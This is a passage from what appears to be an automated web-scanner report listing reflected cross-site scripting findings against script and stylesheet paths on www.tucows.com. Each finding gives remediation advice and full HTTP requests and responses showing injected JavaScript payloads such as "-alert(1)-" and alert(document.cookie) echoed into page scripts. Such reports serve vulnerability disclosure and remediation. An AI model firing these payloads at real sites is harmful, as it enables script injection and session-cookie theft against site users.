This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/corpbar3f85d"-alert(1)-"109c256849a/cb3.0/css/style.css HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:46 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/corpbar3f85d"-alert(1)-"109c256849a/cb3.0/css/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.111. http://www.tucows.com/includes/corpbar/cb3.0/css/style.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/corpbar/cb3.0/css/style.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b6fb"-alert(1)-"fc67c6d109f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/corpbar/cb3.01b6fb"-alert(1)-"fc67c6d109f/css/style.css HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:56 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32620

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/corpbar/cb3.01b6fb"-alert(1)-"fc67c6d109f/css/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.112. http://www.tucows.com/includes/corpbar/cb3.0/css/style.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/corpbar/cb3.0/css/style.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45e8b"-alert(1)-"4bed83e5cce was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/corpbar/cb3.0/css45e8b"-alert(1)-"4bed83e5cce/style.css HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:23:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 33078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/corpbar/cb3.0/css45e8b"-alert(1)-"4bed83e5cce/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.113. http://www.tucows.com/includes/corpbar/cb3.0/css/style.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/corpbar/cb3.0/css/style.css

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1a29"-alert(1)-"d118442f3f9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/corpbar/cb3.0/css/style.csse1a29"-alert(1)-"d118442f3f9 HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:23:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32137

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/corpbar/cb3.0/css/style.csse1a29"-alert(1)-"d118442f3f9";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.114. http://www.tucows.com/includes/js/aalib.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/aalib.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49df9"-alert(1)-"7cec1abd243 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes49df9"-alert(1)-"7cec1abd243/js/aalib.js HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:38 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31791

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes49df9"-alert(1)-"7cec1abd243/js/aalib.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.115. http://www.tucows.com/includes/js/aalib.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/aalib.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63f1c"-alert(1)-"5f5b3393d9b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js63f1c"-alert(1)-"5f5b3393d9b/aalib.js HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:48 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32308

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/js63f1c"-alert(1)-"5f5b3393d9b/aalib.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.116. http://www.tucows.com/includes/js/aalib.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/aalib.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82b97"-alert(1)-"d0e2ad1d532 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js/aalib.js82b97"-alert(1)-"d0e2ad1d532 HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:57 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/js/aalib.js82b97"-alert(1)-"d0e2ad1d532";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.117. http://www.tucows.com/includes/js/ajaxlib.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/ajaxlib.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ccea9"-alert(1)-"cd05073d4ca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includesccea9"-alert(1)-"cd05073d4ca/js/ajaxlib.js HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:36 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32543

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includesccea9"-alert(1)-"cd05073d4ca/js/ajaxlib.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.118. http://www.tucows.com/includes/js/ajaxlib.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/ajaxlib.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87352"-alert(1)-"0f2157d1bbf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js87352"-alert(1)-"0f2157d1bbf/ajaxlib.js HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/js87352"-alert(1)-"0f2157d1bbf/ajaxlib.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.119. http://www.tucows.com/includes/js/ajaxlib.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/ajaxlib.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3034"-alert(1)-"04ca174d04c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js/ajaxlib.jse3034"-alert(1)-"04ca174d04c HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:54 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 33092

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/js/ajaxlib.jse3034"-alert(1)-"04ca174d04c";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.120. http://www.tucows.com/includes/js/show_layer.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/show_layer.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5361f"-alert(1)-"5652dc7710f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes5361f"-alert(1)-"5652dc7710f/js/show_layer.js HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
